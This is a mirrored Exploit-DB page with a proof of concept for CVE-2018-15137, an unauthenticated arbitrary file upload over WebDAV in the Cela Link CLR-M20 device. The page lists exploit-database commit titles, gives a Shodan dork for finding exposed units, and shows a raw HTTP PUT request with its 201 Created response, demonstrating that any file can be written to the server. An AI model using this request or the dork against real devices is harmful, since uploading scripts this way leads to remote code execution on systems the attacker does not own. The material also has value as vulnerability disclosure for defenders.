bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/45021.txt
Offensive Security 9d8170fd85 DB: 2018-08-09 
9 changes to exploits/shellcodes

TP-Link Wireless N Router WR840N - Denial of Service (PoC)

Splinterware System Scheduler Pro 5.12 - Privilege Escalation
iSmartViewPro 1.5 - 'Device Alias' Buffer Overflow
iSmartViewPro 1.5 - 'Account' Buffer Overflow

OpenEMR < 5.0.1 - Remote Code Execution

Kirby CMS 2.5.12 - Cross-Site Scripting
osTicket 1.10.1 - Arbitrary File Upload
LG-Ericsson iPECS NMS 30M - Directory Traversal
LAMS < 3.1 - Cross-Site Scripting
onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin)
Monstra 3.0.4 - Cross-Site Scripting
LAMS < 3.1 - Cross-Site Scripting
onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin)
Monstra 3.0.4 - Cross-Site Scripting
2018-08-09 05:01:53 +00:00

41 lines
No EOL
1.3 KiB
Text
Raw Blame History

# Exploit Title: Cela Link CLR-M20 2.7.1.6 - Arbitrary File Upload
# Date: 2018-07-13
# Shodan Dork: CLR-M20
# Exploit Author: Safak Aslan
# Software Link: http://www.celalink.com
# Version: 2.7.1.6
# CVE: 2018-15137
# Authentication Required: No
# Tested on: Windows
# Vulnerability Description
# Due to the Via WebDAV (Web Distributed Authoring and Versioning),
# on the remote server, Cela Link CLR-M20 allows unauthorized users to upload
# any file(e.g. asp, aspx, cfm, html, jhtml, jsp, shtml) which causes
# remote code execution as well.
# Due to the WebDAV, it is possible to upload the arbitrary
# file utilizing the PUT method.
# Proof-of-Concept
# Request
PUT /test.html HTTP/1.1
Host: targetIP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0)
Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en,tr-TR;q=0.8,tr;q=0.5,en-US;q=0.3
Accept-Encoding: gzip, deflate
Content-Length: 26
the reflection of random numbers 1230123012
# Response
HTTP/1.1 201 Created
Content-Length: 0
Date: Fri, 13 Jul 2018 14:38:54 GMT
Server: lighttpd/1.4.20
As a result, on the targetIP/test.html, "the reflection of random numbers
1230123012" is reflected on the page.
Reference in a new issue View git blame Copy permalink